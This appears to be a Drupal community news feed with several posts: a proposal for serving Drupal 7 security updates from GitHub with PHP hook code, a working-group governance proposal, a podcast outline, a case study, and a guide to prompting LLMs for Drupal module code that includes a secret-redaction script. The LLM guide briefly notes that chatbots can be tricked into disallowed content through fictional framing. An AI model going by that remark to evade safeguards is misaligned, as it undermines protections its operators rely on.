  1. Drupal 7 modules can get unsupported on drupal.org, but releases (including security updates) can be made on Github. Maintainers and the security team don't have to feel guilty: D7Security will pick it up if it is used by a member company.
  2. The Drupal Security team can publish any non mass-exploitable Drupal 7 vulnerability, as is already policy. Then the D7Security team can pick it up.
  3. For mass-exploitable remote code execution vulnerabilities the Drupal Security Team can reach out to the D7Security team with a warning even beyond January 5, 2025.

Pushing update notifications from Github to Drupal 7 sites

The update notification system of Drupal 7 works with XML feeds that are downloaded from drupal.org (example for devel module). Luckily this update system is pluggable and we can apply some nice tricks to download update information XML from static Github files instead.

The rough workflow would go like this:

  1. The unsupported module code is forked to a Github repository.
  2. A fix is committed, a new git tag and a release is created on Github.
  3. The update XML is crafted by hand (later automated) in a central Github repository pointing to the Github release (dummy example for devel). The path devel/7.x is important as that will be appended by update module when fetching the XML.
  4. The module is added to the list of supported modules on Github (dummy example for devel)
  5. The Drupal 7 site operator installs a small helper module that fetches update information from Github on top of the default drupal.org source. The example code for that is just a few lines of code:
/**
 * Implements hook_update_projects_alter().
 */
function d7sec_client_update_projects_alter(array &$projects) {
  // Fetch the list of supported D7 projects from GitHub.
  $d7sec_supported = drupal_http_request('https://raw.githubusercontent.com/klausi/d7sec_update/main/supported_projects.txt');
  if ($d7sec_supported->code == 200) {
    $supported_projects = explode("\n", $d7sec_supported->data);
    foreach ($supported_projects as $supported_project) {
      $supported_project = trim($supported_project);
      if (isset($projects[$supported_project])) {
        // Replace the project update XML URL with our own, pointing to Github.
        $projects[$supported_project]['info']['project status url'] = 'https://raw.githubusercontent.com/klausi/d7sec_update/main';
      }
    }
  }
  else {
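    // print_r() needs TRUE as its second argument to return the dump as a
    // string instead of printing it.
    watchdog('d7sec_client', 'Could not fetch supported projects list from GitHub: <pre>@error</pre>', [
      '@error' => print_r($d7sec_supported, TRUE)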
    ], WATCHDOG_ERROR);
  }
}

This will now show any new releases in the Drupal 7 backend as usual and trigger update notification emails.

The great benefit of this static file approach is that there are no update server operation costs.

One important thing missing here is the drupal.org packaging script which adds version information into the module's info file. I'm sure there are some other details as well that I have missed, but the approach should work in general.
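
A hardened variant of the helper hook above, added here as an example and not code from the proposal: it validates each list entry as a project machine name, caches the list so update checks do not depend on GitHub every time, and logs only the status code and error string. The two helper function names, the constants, the cache ID, the six-hour lifetime and the machine-name pattern are assumptions; the URLs are the ones used in the post.

```php
<?php

// Added example. Constant names are hypothetical; URLs are from the post.
define('D7SEC_LIST_URL', 'https://raw.githubusercontent.com/klausi/d7sec_update/main/supported_projects.txt');
define('D7SEC_STATUS_URL', 'https://raw.githubusercontent.com/klausi/d7sec_update/main');

/**
 * Turns the raw list into validated, de-duplicated project machine names.
 *
 * Assumption: project names are lowercase letters, digits and underscores,
 * starting with a letter. Every other line is dropped, so a malformed list
 * cannot introduce unexpected array keys.
 */
function d7sec_client_parse_supported_list($raw) {
  $names = array();
  foreach (preg_split('/\r\n|\r|\n/', (string) $raw) as $line) {
    $line = trim($line);
    if (preg_match('/^[a-z][a-z0-9_]*$/', $line)) {
      $names[$line] = $line;
    }
  }
  return array_values($names);
}

/**
 * Returns the supported project list, fetching it at most every six hours.
 *
 * On a failed fetch the last cached copy is reused; with no copy at all the
 * result is empty and every project keeps its drupal.org status URL.
 */
function d7sec_client_supported_projects() {
  // cache_get() can return entries past their expiry, so check it here.
  $cache = cache_get('d7sec_client:supported');
  if ($cache && $cache->expire > REQUEST_TIME) {
    return $cache->data;
  }

  $response = drupal_http_request(D7SEC_LIST_URL, array('timeout' => 10));
  if ($response->code != 200 || !isset($response->data)) {
    // Log the status and error string only, not the whole response object.
    watchdog('d7sec_client', 'Could not fetch supported projects list from GitHub (code @code): @error', array(
      '@code' => $response->code,
      '@error' => isset($response->error) ? $response->error : 'unknown',
    ), WATCHDOG_ERROR);
    return $cache ? $cache->data : array();
  }

  $names = d7sec_client_parse_supported_list($response->data);
  cache_set('d7sec_client:supported', $names, 'cache', REQUEST_TIME + 6 * 3600);
  return $names;
}

/**
 * Implements hook_update_projects_alter().
 */
function d7sec_client_update_projects_alter(array &$projects) {
  foreach (d7sec_client_supported_projects() as $name) {
    if (isset($projects[$name])) {
      // Only projects that are both installed and listed are redirected.
      $projects[$name]['info']['project status url'] = D7SEC_STATUS_URL;
    }
  }
}
```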

Why Github?

It should be possible to do a similar approach on drupal.org's Gitlab, but I think it could get very confusing where the actual replacement code for a module lives. I prefer Github for organization governance reasons, then it is easy to define repository access based on groups.

Conclusion

This is currently a proposal that I would like to get feedback on. Feel free to reach out and discuss in the Drupal ideas issue.

Dec 11 2023
Dec 11

The Technical Working Group (TWG) is announcing two coding standards changes for final discussion. Feedback will be reviewed at the meeting scheduled for Tuesday 2 January 2024 2100 UTC.

Issues for discussion

The Coding Standards project page outlines the process for changing Drupal coding standards.

Join the team working on Coding Standards

Join #coding-standards in Drupal Slack to meet and work with others on improving the Drupal coding standards. We work on improving our standards as well as implementing them in the core software.

Dec 11 2023
Dec 11

Today we are talking about Being a Digital Nomad, common nomadic hurdles, and realized work/life benefits with guests Chad Hester and Shelley Goetz. We’ll also cover Flag as our module of the week.

For show notes visit:
www.talkingDrupal.com/428

Topics

  • What does digital nomad mean?
  • When did you first start to think about this
  • What was your physical journey like
  • What do you do for work
  • What is the biggest win
  • How did this affect family dynamics
  • What was the biggest gotcha
  • Tips and tricks
  • Long term plan
  • Why not Europe or South America
  • Question from Stephen: As a Patriots fan what are your thoughts on the 2023 season, is Bill Belichick staying or going

Resources

Guests

Shelley Goetz - shelleygoetz
Chad Hester - chadkhester.com chadhester

Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Ron Northcutt - community.appsmith.com rlnorthcutt

MOTW

Correspondent

Martin Anderson-Clutz - @mandclu
Flag

  • Brief description:
    • Have you ever wanted a simple way to let users bookmark, like, or even flag as inappropriate content on your Drupal site? There’s a module for that.
  • Brief history
    • How old: originally created in 2008 by quicksketch, who listeners may remember as the original author of Webform
    • Versions available: 7.x-3.9 and 8.x-4.0-beta4
  • Maintainership
    • Actively maintained, but no commits in the last year
  • Has a handbook, but it’s in the old documentation system
  • Number of open issues: 675, 132 of which are bugs against the 8.x branch
  • Usage stats:
    • Over 38,000 sites
  • Maintainer(s):
    • Recent releases by Berdir, who we recently mentioned as the maintainer of TMGMT in episode #426
  • Module features and usage
    • The Flag module provides a flexible system that can reference any kind of entity, so content, users, comments and so on
    • When you create a flag type, you set the target entity type, and then you can optionally choose specific bundles that can be flagged
    • Flags can be per-user, like bookmarks, or global, meaning that they’re the same for everyone
    • Links to Flag or Unflag content or other entities can be displayed in a variety of ways: in a field, in entity links, as contextual links, and more
    • By default flag links are rendered as AJAX links that flag or unflag content without reloading the page, but you can configure them to display in various ways, including as links to a field entry form, because flag types are also fieldable
    • There is extensive views integration, so it’s easy to list flagged content, for example to show a user content they’ve flagged as their favorites. The ecosystem of modules around Flag includes one called Views Flag Refresh that can trigger a view to automatically update via AJAX as soon as any content in that view is flagged or unflagged
    • Not long ago I used Flag as part of a lightweight task management system within Drupal, and anyone wanting to try that out can install the Tasks module
Dec 11 2023
Dec 11

Client

Our web studio was commissioned to develop a B2B platform for vendors and buyers of refrigeration and air conditioning equipment. On the platform, suppliers can add their products to the catalog, publish articles, advertise their services, and search for clients and contractors for free. We developed the website and implemented the Drupal Commerce framework. But the latter turned out to be an awful waste of time.

b2b platform development

How did this happen?

The client asked, among other things, to implement a subscription functionality on the website. The subscription expands the free plan and allows users to publish more articles, attach more files, and post job ads.

The functional spec stated that information about a subscription request should be stored in Lexoffice, a third-party service. However, the client did not specify which tool should be used to implement the functionality on the website itself. Based on the experience, we decided to use Drupal Commerce for this. After installation, questions followed, such as why checkout appeared on the site and so on.

Drupal Commerce is a set of modules that help businesses sell online. With it, the site owner presents products, accompanies the client at all stages of placing an order, tracks invoices, receipts and payments, and arranges delivery.

Role of Drupal Commerce

As the work progressed, details that were missing from the specification began to emerge. It turned out that the payment for the subscription was to be made through a third-party service. Here was what the process looked like: the user selected a plan, clicked Submit, the data was collected from their registration form or profile, sent to a third-party API to verify tax information, and only then to Lexoffice. The site owner saw the order in the Lexoffice admin panel and sent the client an invoice, which he paid through a bank.

subscription service development


However, subscriptions in Drupal Commerce can only be paid for directly on the website. The module cannot process such a complicated path. By default, it doesn’t even have a subscription feature. In this case, Drupal Commerce was used only to store the plan terms, create orders, and send them to Lexoffice. Payments were processed by another service. As a result, the module’s acquiring functionality was not needed here; simple Drupal would be enough.

What could have been done better

The subscription feature could have been realized faster and without resorting to additional Drupal modules. We spent a lot of time integrating the website with Lexoffice (about 80 hours) due to this service’s poor documentation. Another 40 hours were spent changing the Orders entities in Drupal Commerce. Without the module, we would have written a custom service that would send the order to the payment service in 20 hours and call it a day.

But Drupal Commerce can still come in handy! The client is considering expanding the website’s functionality, for example, adding the option to publish 10 more advertisements for an additional fee. In this case, the module will be used for its intended purpose.

Dec 11 2023
Dec 11

We’re back with our monthly selection of our favorite Drupal articles & most important Drupal-related news. We hope you enjoy the November edition!

Beyond Code: Drupal’s Community, Impact, and Possibilities

For the first article from November, we have a great piece by Tiffany Farriss of Palantir about Drupal being more than just code and going hand in hand with community, since the code itself is a direct expression of the open-source values that Drupal has been built and has thrived on.

Tiffany’s article draws an interesting comparison between Drupal and the Ship of Theseus, since Drupal has changed so much since its inception over 20 years ago, yet its essence still remains the same. Finally, it challenges some outdated tenets of the Drupal community, such as emphasizing the need to get off the Drupal island, and closes by highlighting the importance of Drupal’s Open Web Manifesto.

Read more about Drupal’s community, impact & possibilities

On a 1-10, How Important is Your Drupal Website?

The next article comes from Danita Bowman of Promet Source and focuses on the risks of outdated legacy technologies such as Drupal 7, while contrasting that with the enhanced capabilities of newer versions and making a strong case for upgrading to Drupal 10, as well as exploring the reasons for such a large number of sites still running on the outdated Drupal 7.

Some of the major issues Danita’s article exposes are the viability of legacy technology and the fast approaching end of life for Drupal 7, meaning no security coverage or new features, except by custom request, as well as diminished Drupal 7 support from the community of contributors.

Read more about how Drupal 7 compares to the latest versions

CKEditor 5 Empowers Creativity: What's New in Drupal 10

Moving on, this article from Tony Hutson of cti digital also talks about the benefits of Drupal 10, but focuses particularly on the features of the new CKEditor 5 that comes out of the box in Drupal 10, and how these improve the experience of content editors working with Drupal. 

The features that Tony highlights are streamlined drag and drop; better link and table management; optimized handling of images and fonts; as well as a number of other useful extensions, plus the suite of CKEditor 5 premium features, including the Productivity Pack premium bundle. 

Read more about CKEditor 5 in Drupal 10

Love thy CMS!

It’s a rare occasion not to include an article from the Schema.org Blueprints modules maintainer Jacob Rockowitz in our monthly overview. In this one, he talks about learning to love your CMS, an idea that’s often been discussed in the Drupal community over the years in different settings.

An internal discussion at Jacob’s organization about the concept of loving one’s CMS was also the basis for his session demoing how Schema.org can help streamline Drupal’s content authoring experience, with the more appealing and poetic adjustment of “Love thy CMS!”.

Read more about loving thy CMS

A brief history of Drupal 7 and overview of end-of-life options

Since the Drupal 7 end of life is fast approaching (the final extension will end in just over a year), there has been a lot of important content lately related to the D7 EOL and what site owners’ options are. 

This great article from Kristen Pol of QuantCDN not only provides an overview of the end-of-life options, but also takes a look at the history of Drupal 7 since its release in January 2011 and how the fundamental reworking of the CMS with Drupal 8 impacted the community and led to the creation of Backdrop CMS.

Read more about the history of Drupal 7 & its EOL

Elevated Marketing Strategies with Drupal

Next up, we have an article about how Drupal empowers marketers, written by Kyla Tucker of Acro Commerce. The main benefits for marketers are streamlined back-end management, Drupal’s customizability, mobile-optimized design, top-notch SEO & analytics capabilities, and other useful UX features such as strong multilingual support.

To businesses that successfully leverage Drupal for their marketing strategies, the benefits are also plentiful; Drupal is cost-effective, prioritizes security, and has a number of other advantages stemming from its open-source nature that have transformed it into something more than a mere content management system.

Read more about using Drupal in your marketing strategy

The Pitchburgh Diaries - decoupled Layout Builder Sprint 5 & 6

We continue with an article by Lee Rowlands of PreviousNext, who provides an update on the latest progress made on their Pitchburgh project, a React-based decoupled Layout Builder.

This article breaks down the work of the final two out of six sprints that were part of the Pitchburgh budget, with the first four focusing on feature development and sprints 5 and 6 on instantiating the Layout Editor in an actual Drupal website.

Lee covers the key highlights from these two final sprints, and concludes by announcing that the PreviousNext team plan to continue working on this project beyond what was covered through Pitchburgh and already have a backlog of new desirable features.

Read more about decoupled Layout Builder Sprint 5 & 6

Drupal 10 will be supported until the release of Drupal 12 in mid-late 2026

Last on our Drupal news overview for this month is a blog post from Gábor Hojtsy announcing the Drupal release schedule from now up until the release of Drupal 12 in 2026. 

Following this new release schedule, a new major version will be released every two years, with two years of active support and an additional two years of maintenance and security coverage (e.g. for Drupal 10, this means support will end in 2026 with the release of Drupal 12).

Read more about Drupal’s future release schedule


With that we conclude our November selection of top Drupal blog posts. We hope you enjoyed this month’s edition!

Dec 08 2023


We're thrilled to introduce Lenny Moskalyk, one of the newest members on the Drupal Association Board. Lenny is a Senior Project Manager at Cocomore and is involved in organizing DrupalCamp Kyiv. She's actively engaged in the Ukrainian Drupal Community and serves as an Advisory Board Member of DrupalCon Europe, among other contributions to various Drupal events. Recently, Lenny received the Women in Drupal 2023 award in the ‘Scale’ category, given to those who boost growth in Drupal—her accomplishments that led to this award represent the value of growth within the Drupal Community. 

Lenny recently joined the Drupal Association Board, and she shares her insights on this exciting journey:

What are you most excited about when it comes to joining the Drupal Association Board?
The opportunity to help and contribute back to the community in an efficient, meaningful way.

What do you hope to accomplish during your time on the board?
I aim to build connections with underrepresented communities and make sure their voices are heard.

What specific skill or perspective do you contribute to the board?
Being the first Ukrainian on the Board, I am representing one of the biggest and most active communities in Europe. I have experience in organizing Drupal events of various scales and being an experienced project manager, I have excellent communication skills.

How has Drupal impacted your life or career?
I started to work with Drupal around 10 years ago, and from that day the ideas of open source and support within the community won my heart. It inspired me to try myself in new roles, such as co-organizing DrupalCamp Kyiv. Through Drupal, I have discovered many new things about different cultures, and nowadays, wherever around the world I go—I know for sure where to find like-minded people :)

Tell us something that the Drupal community might not know about you.
I am a passionate traveler who recently added sailing skills! Another thing that brings me joy is cooking for my loved ones and sharing meals with them :)

Share a favorite quote or piece of advice that has inspired you.
“Fortune favors the brave.”

We can't wait to experience the incredible contributions Lenny will make during her time on the Drupal Association Board. Thank you, Lenny, for dedicating yourself to serving the Drupal community through your board work! Connect with Lenny on LinkedIn.

The Drupal Association Board of Directors comprises 12 members, with nine nominated for staggered 3-year terms, two elected by the Drupal Association members, and one reserved for the Drupal Project Founder, Dries Buytaert. The Board meets twice in person and four times virtually each year, overseeing policy establishment, executive director management, budget approval, financial reports, and participation in fundraising efforts.

Dec 08 2023

The Drupal core committers and Drupal 10 readiness initiative are seeking feedback on a proposed new working group. The group's mission is to focus on contributed modules where a maintainer has not updated to the next major Drupal version. This includes modules where the maintainer has requested assistance as well as modules where the maintainer is no longer active. This effort will benefit the entire Drupal ecosystem.

This group will have elevated privileges on Drupal.org like those that exist for the Security Team and Site Moderators.

Background

Currently the Project Update Bot generates automated compatibility patches for contributed projects. These patches are reviewed and tested by Drupal community members and then set to the "Reviewed & tested by the community" status.

However, for some modules, these patches are not committed in a timely fashion. This creates a barrier to updating to the next Drupal major version for sites that use this module.

There are existing workarounds. One is the Composer Lenient plugin which allows affected sites to install a patched version of the module. However, this is not a substitute for having a compatible version of the module.

Proposal

Establish a working group that has the ability to appoint its members as a temporary maintainer of a project. The only task of the temporary maintainer is to review, test and commit a patch or merge request that makes the module compatible with the new Drupal major version and optionally create a new release. The group will be able to take this action in the following circumstances:

  1. The project MUST have a canonical issue for updating to the next major version of Drupal. This issue MUST have a patch or merge request. The issue MUST be marked "Reviewed & tested by the community" and MUST NOT have had feedback from a module maintainer within the past two weeks. The following proposal refers to this as the contributed project issue.

  2. An attempt MUST have been made by members of the community to contact the module maintainers via their Drupal.org contact form. Record of this attempt MUST be recorded on the contributed project issue.

  3. An attempt SHOULD be made by members of the community to contact the module maintainers via a messaging platform such as the Drupal community Slack. Record of this attempt MUST be recorded on the contributed project issue.

  4. If there is no response from the module maintainer for seven (7) days, a member of the community MAY escalate the module to the Project Update Working Group. To escalate a module, create a separate issue in the Project Update Working Group issue queue. This is termed the project update group issue. An attempt SHOULD be made to notify members of the Project Update Working Group via a messaging platform such as the Drupal community Slack.

  5. The Project Update Working Group MUST make a subsequent attempt to contact the module maintainers via their Drupal.org contact form. This communication MUST outline that failure to respond within seven (7) days may result in the Project Update Working Group committing the contributed project issue on their behalf. Record of this contact MUST be recorded on the contributed project issue. Any communication between the Project Update Working Group and the module maintainers MUST be recorded on the project update group issue.

  6. When the seven-day period from item 5 has elapsed, the maintainer has had two weeks overall to respond. At this point, a member of the Project Update Working Group MUST decide on the next step. The next step is to either intervene or not. If the decision is to intervene, then the group must also decide if a tagged release is to be made as well as committing the change.  When making the decision the Project Update Working Group member MUST do the following.

    1. Take into consideration recent activity from the maintainer in the project.

    2. Take into consideration the age of the contributed project issue.

    3. Take into account the complexity of the patch/merge request. They must work to avoid regressions. The level of automated test coverage for the project SHOULD be used to inform the likelihood of a regression.

    4. Take into account the quality of the reviews.

    5. Take into account the possible lifespan of the module and the needs of the community. For example, if the module duplicates functionality added to core or another module, then they may decide not to intervene.

    6. Consider if the module is looking for new maintainers and if anyone has nominated themself for the role. The Project Update Working Group SHOULD favor supporting a new maintainer over intervention.

    7. The Project Update Working Group SHOULD aim to achieve compatibility with the major version in a backwards-compatible way.

  7. If a member of the Project Update Working Group decides to intervene and commit the patch, then the following occurs:

    1. A record of the decision MUST be recorded on the contributed project issue.

    2. The member of the Project Update Working Group MUST nominate to make the commit and/or release. Record of this nomination MUST occur on the contributed project issue.

    3. The member of the Project Update Working Group MUST make a temporary change to the project's maintainers to add themself as a maintainer. Record of this change MUST be made on the contributed project issue.

    4. The member of the Project Update Working Group with temporary maintainer access will then commit the patch or merge request. This MUST be recorded on the contributed project issue.

    5. The member of the Project Update Working Group MUST acknowledge that the commit was made on the contributed project issue.

    6. If it was decided that a release should be made, a member of the Project Update Working Group will create a tag and add a release node for the tag on Drupal.org. The member making this action MUST make a record of this on the contributed project issue. The release MUST follow semantic versioning rules for backwards compatibility. The member SHOULD strive to make a new minor version to allow sites to install a compatible version without updating the major version of Drupal.

    7. If the module maintainer has not requested assistance from the Project Update Working Group, a member of the Project Update Working Group MUST update the project node on Drupal.org to change it to 'No further development'. If the module has opted in to Security team coverage, the member of the Project Update Working Group MAY opt the module out of this coverage.

    8. Any member of the Project Update Working Group MUST then mark the original contributed project issue as fixed. This action SHOULD NOT prevent opening of new issues for the project for major version compatibility.

    9. A member of the Project Update Working Group MUST revoke the temporary maintainer rights within fourteen (14) days. Record of this change MUST be recorded on the contributed project issue.

    10. If the module was marked 'No further development' and if no such issue exists for the contributed project - a member of the Project Update Working Group MUST open a new issue in the project's queue seeking a new maintainer.

    11. If additional compatibility issues are found between the module and the next major version of Drupal, the process above repeats.

Working group membership

The working group will comprise community members who self-nominate. Interested community members must receive two seconding recommendations from other community members. Nomination and seconding will occur publicly on Drupal.org in the Project Update Working Group issue queue. Community members will be able to share their thoughts or concerns on the nominees' applications. Concerns relating to conduct of members of the group MUST follow Drupal's standard Community Working Group processes.

The initial membership of the group will comprise at least five (5) individuals. Members of the group should have a record of maintaining core or contributed projects and have the git-vetted role on Drupal.org. In addition the group may contain provisional members. These members will not have the ability to change project maintainers and will require the support of a full member to carry out their duties.

The initial make up of the group will be vetted by the core committer team and security team. Subsequent appointments will be vetted by the Project Update Working Group with a fourteen day period for veto from the security team and/or core committers.

Membership of the group is for a single major update. For example, from Drupal 10 to Drupal 11. The first major update in which the group is active will be from Drupal 10 to 11. At the end of each major cycle, members can opt to renew their membership for the next major update cycle. As with the original nomination, this process will happen in public and require two seconding recommendations from the community. 

Additional lifecycle option

To complement this process, it is proposed that a new Abandoned lifecycle status is added for project info files.

If this is successful, the following changes will be made:

  1. The process at (6) above will be amended such that the module's info file is updated to set the lifecycle value to 'abandoned'.

  2. A lifecycle link is added that points to the issue in the project's queue where a new maintainer is sought.

Comment period

Community feedback is sought on the proposed process. Please use this issue to add your input. The feedback period will last until Friday January 12th 2024.

Dec 07 2023

2023 appears to be the year that Artificial Intelligence emerged from the shadows and into the mainstream, but we have barely scratched the surface of AI's potential. AI is here, and its impact on life and work is developing at an exponential pace.

As this disruptive technology is generating quick answers, streamlining processes, and creating vast new efficiencies, hundreds of possibilities for AI – ranging from healthcare diagnoses, to cybersecurity threat detection, government services, Drupal development, API development, and many, many more – are taking shape.

This post will explore how an AI large language model (LLM), such as ChatGPT, can be used for writing code – specifically, a Drupal module.

Getting Started with an LLM: Prompt Engineering

An LLM is essentially a massive, simulated brain trained on an even more massive amount of data.  LLMs such as ChatGPT are extremely good at identifying the "next best word" in a conversation to the point where human-like intelligence emerges.

Interacting with an LLM is done conversationally, beginning with a "prompt." Think of this process like writing a software program, with conversational English being the programming language.  

The first step in leveraging an LLM is to give it context. Even if the context of what is being asked appears obvious, stating it explicitly can increase the quality of ideas and insights that are returned.

For the purpose of generating code, a good example of a starting prompt could begin with: "You are an expert Drupal 10 developer..."  Since the answer is built one word at a time, an explicit prompt such as this helps to create a framework for success.  
 

What is the “Chain of Thought” Technique in AI?

Another technique called "Chain of Thought" can be very helpful to increase the quality of an AI response. The idea is to list out the steps the AI should take when thinking about a solution. This is similar to writing a software program except communication is at a higher level of abstraction.   

For example, rather than writing a prompt that reads: "As an expert chef, please give me an apple pie recipe," the Chain of Thought technique would provide deeper, step-by-step instructions such as:

"As an expert chef, please think about different, popular apple pie recipes, specifically looking at the crust and the filling. Identify the best aspects from the different recipes. Consider how they could be combined to make an even better recipe. Finally, generate a final recipe."

For more complex topics, the Chain of Thought technique can be broken into multiple steps in a dialogue with an AI tool such as ChatGPT.
 

Refining the Prompt

Because an LLM can act as a natural language program interpreter, giving it rules to follow will help it to better achieve the right results. Here’s an example of a prompt whose purpose is to help write prompts:

"You are an expert Prompt Engineer. Your goal is to craft the best possible prompt to be used by ChatGPT. Please follow the process below:"

  • "Your first response will be to ask me what the prompt should be about. I will provide my answer, but we will need to improve it through continual iterations by going through the next steps."
  • "Based on my input, you will generate two sections: a) Revised prompt (provide your rewritten prompt. It should be clear, concise, and easily understood by you), and b) Ask any relevant questions pertaining to what additional information is needed from me to improve the prompt."
  • "We will continue this iterative process with me providing additional information to you, and you refining the original prompt in the 'Revised prompt' section until I decide this process is complete."
  • "Do not actually process the prompt once it is ready. That will be done in a separate conversation."

AI for Code Creation

Now that we've covered various aspects of Prompt Engineering, let's look at using LLM prompts for code generation. Here are some tips:

  • Generate fully completed code. If the solution you're generating is relatively straightforward, it may be easier to ask the AI to generate fully completed code rather than using placeholder comments. gpt-4 has a tendency to use placeholders which may or may not be helpful depending on the task at hand.
  • Let it know that it is okay to generate a long response. Your prompt could read something like: "It is okay if your response stops abruptly; I will say 'continue.'"
  • Be sure to give it context at the beginning, such as: "You are an expert Drupal 10 developer."
  • Use Chain of Thought to help guide it. By "holding its hand" and providing more detailed steps, the end result is more likely to work correctly.

Sample Chain of Thought Prompt for Creating a Drupal Module

  • You are an expert Drupal 10 developer. 
  • You will be writing a module called "awesome_csv_importer"
  • This module will provide a form where a CSV file can be uploaded. This CSV file will contain data for creating article nodes. Each row will contain a "title" and "body" field.
  • The author for each node should be user 1.
  • Before proceeding, think about Drupal best practices for this CSV import.
  • If there is an issue, an error should be output as a Drupal message.
  • For each file in this module, please note the file's path within the module.
  • Please generate fully completed code; do not use placeholder comments.
  • Please be sure to properly comment on your code, following Drupal code standards.
  • It is okay if your response stops abruptly; I will say "continue."

Here's a screenshot of the beginning of GPT-4's response to this prompt:

ChatGPT prompt to create Drupal module

After the initial code is generated, there is often an iterative process: issues are identified by reviewing or running the code, and the AI tool is then asked to make corrections. If errors are encountered, it is sufficient to just paste the error into a follow-up message.

For more complex solutions, it may be more appropriate to generate sub-sections of the module via different conversations rather than using a single conversation to generate the whole module.

Limitations of AI for Drupal Development

  • Maximum input limitations. First, there are limits to the allowable size of the prompt. The specific size depends on the LLM model in use, but the limits are relatively large so should not be a concern for most tasks. It's important to note that when having a conversation with an LLM, each message sent is within the context of the entire preceding dialog in the conversation. This means the AI can lose some context in a longer conversation, since compression techniques must be used "behind the scenes" to avoid hitting the current LLM's max input limit. When this is the case, it can be appropriate to start a new conversation, with an explanation of what has been covered up to that point, along with any relevant code that has been generated.
  • Scalability. When using LLM APIs such as OpenAI's API, there are limitations on concurrent requests. Particularly for public-facing solutions, it may be necessary to implement queuing and caching mechanisms.
  • Hallucinations. Sometimes, LLMs appear to simply make things up. For example, I've had LLMs generate Drupal code using methods and hooks that simply do not exist, but would be appropriate to use if they did exist. Often, if you point this out, the AI will acknowledge its mistake and provide an alternative solution.
  • Bad judgment. Sometimes, LLM-generated code will work but may not be implemented in the best way. For example, I once asked for code to modify a Drupal view's results but the LLM tried to alter the view's SQL query, which is a less flexible, less maintainable solution than was needed. I've also seen instances where the LLM used pure PHP solutions rather than Drupal-specific solutions. It may also use solutions from older versions of Drupal that might work currently but will fail for future versions.
  • Security concerns. Another critical factor to keep in mind when using LLMs is to never submit sensitive information like passwords. This is because your input may be used to train future LLM models, meaning hackers could, with the right prompt, obtain an output containing this information. While LLMs like ChatGPT have been trained to behave lawfully, they can be tricked into straying from this by asking for "dis-allowed content" within the context of a fictional story.
  • Wrong answers. Sometimes, LLMs simply choose the wrong steps to follow, resulting in an incorrect result. Here's a simple example using math. (Incidentally, you'll notice this response is using a pirate persona. This is because I was experimenting with ChatGPT's custom instructions setting at the time.) In the below example, GPT gives the wrong answer to a simple math problem and then admits it doesn't know why it did that.


ChatGPT producing a math error
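The "Security concerns" point matters most in the paste-the-error workflow described earlier, because Drupal error output and settings.php excerpts often carry credentials. The Python filter below is an added example, not code from the original post; the rule set, the function name `redact_for_llm`, and the sample paste are constructed for illustration and cover only the common patterns listed in the comments.

```python
import re

PLACEHOLDER = "[REDACTED]"

# Quoted PHP string value; \2 refers to the opening quote captured right
# after the prefix group, and backslash-escaped quotes stay inside the value.
_QUOTED = r"""(['"])(?P<secret>(?:\\.|(?!\2).)+)\2"""

# (label, pattern) pairs. Every pattern exposes the sensitive part as the
# named group "secret" so only that part is replaced.
RULES = [
    # 'password' => 'value' entries, as in the $databases array of settings.php
    ("php_array_secret", re.compile(
        r"""(['"](?:password|pass|hash_salt|api_key|secret|token)['"]\s*=>\s*)"""
        + _QUOTED, re.I)),
    # $settings['hash_salt'] = 'value';
    ("php_settings_assignment", re.compile(
        r"""(\$(?:settings|config)\[['"][^'"\]]*(?:salt|secret|key|password|token)"""
        r"""[^'"\]]*['"]\]\s*=\s*)""" + _QUOTED, re.I)),
    # scheme://user:password@host
    ("url_credentials", re.compile(
        r"(\b[a-z][a-z0-9+.-]*://[^\s:/@]+:)(?P<secret>[^\s/]+)(?=@)", re.I)),
    # Authorization: Bearer <token>
    ("bearer_token", re.compile(
        r"(\bAuthorization:\s*(?:Bearer|Basic)\s+)(?P<secret>[A-Za-z0-9._~+/=-]+)",
        re.I)),
    # SMTP_PASSWORD=value style environment assignments
    ("env_assignment", re.compile(
        r"(\b[A-Z0-9_]*(?:PASSWORD|SECRET|TOKEN|API_KEY)[A-Z0-9_]*\s*=\s*)"
        r"(?P<secret>[^\s'\"]+)")),
]


def redact_for_llm(text):
    """Return (redacted_text, findings) for text about to be pasted into an LLM.

    findings is a list of (line_number, rule_label); it never contains the
    secret itself, so it is safe to log or show in a review step.
    """
    findings = []
    out_lines = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for label, pattern in RULES:
            def mask(match, label=label):
                if match.group("secret") == PLACEHOLDER:
                    return match.group(0)  # already redacted, do not recount
                findings.append((line_no, label))
                start, end = match.span("secret")
                base = match.start()
                whole = match.group(0)
                return whole[:start - base] + PLACEHOLDER + whole[end - base:]
            line = pattern.sub(mask, line)
        out_lines.append(line)
    return "\n".join(out_lines), findings


# Constructed sample: an error message plus config excerpts of the kind a
# developer might paste into a follow-up message. All values are made up.
SAMPLE_PASTE = "\n".join([
    "PDOException: SQLSTATE[HY000] [1045] Access denied for user 'drupal'@'db' (using password: YES)",
    "DATABASE_URL=mysql://drupal:Constructed-Pa55@db.example.test:3306/drupal",
    "$databases['default']['default'] = [",
    "  'database' => 'drupal',",
    "  'username' => 'drupal',",
    "  'password' => 'Constructed-Pa55',",
    "  'host' => 'db.example.test',",
    "];",
    "$settings['hash_salt'] = 'constructed-salt-0000';",
    "SMTP_PASSWORD=constructed-smtp-pw",
    "Authorization: Bearer constructed.token.value",
])

if __name__ == "__main__":
    clean, found = redact_for_llm(SAMPLE_PASTE)
    print(clean)
    for line_no, label in found:
        print(f"line {line_no}: {label}")
```

Pattern-based redaction only catches the shapes it knows about, so review the findings list and the redacted text before sending it.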

Prompting for the Big Picture: AI for Drupal Module Development

The above represents real-world walkthroughs and recent experiences of leveraging an LLM to develop a Drupal module. There’s much more. As another demonstration of the instant insights and information that ChatGPT can provide, I recently entered a ChatGPT prompt that read:

Can AI be leveraged to develop a module in Drupal?

Here's the answer that resulted from this prompt:


Yes, AI can be leveraged to develop modules in Drupal. Drupal is an open-source content management system (CMS) that allows developers to create and customize websites. AI technologies can be integrated into Drupal modules to enhance various aspects of a website, such as personalization, content recommendation, natural language processing, and more.

Here are some ways AI can be incorporated into Drupal modules:

Content Personalization:

  • Use AI algorithms to analyze user behavior and preferences.

  • Develop a Drupal module that dynamically displays personalized content based on user preferences, improving user engagement.

Chatbots and Conversational Interfaces:

  • Integrate AI-powered chatbots or conversational interfaces within Drupal websites.

  • Create a module that allows users to interact with the website using natural language, providing a more user-friendly experience.

Search Optimization:

  • Implement AI-driven search algorithms to improve the accuracy and relevance of search results.

  • Develop a Drupal module that integrates advanced search capabilities powered by AI.

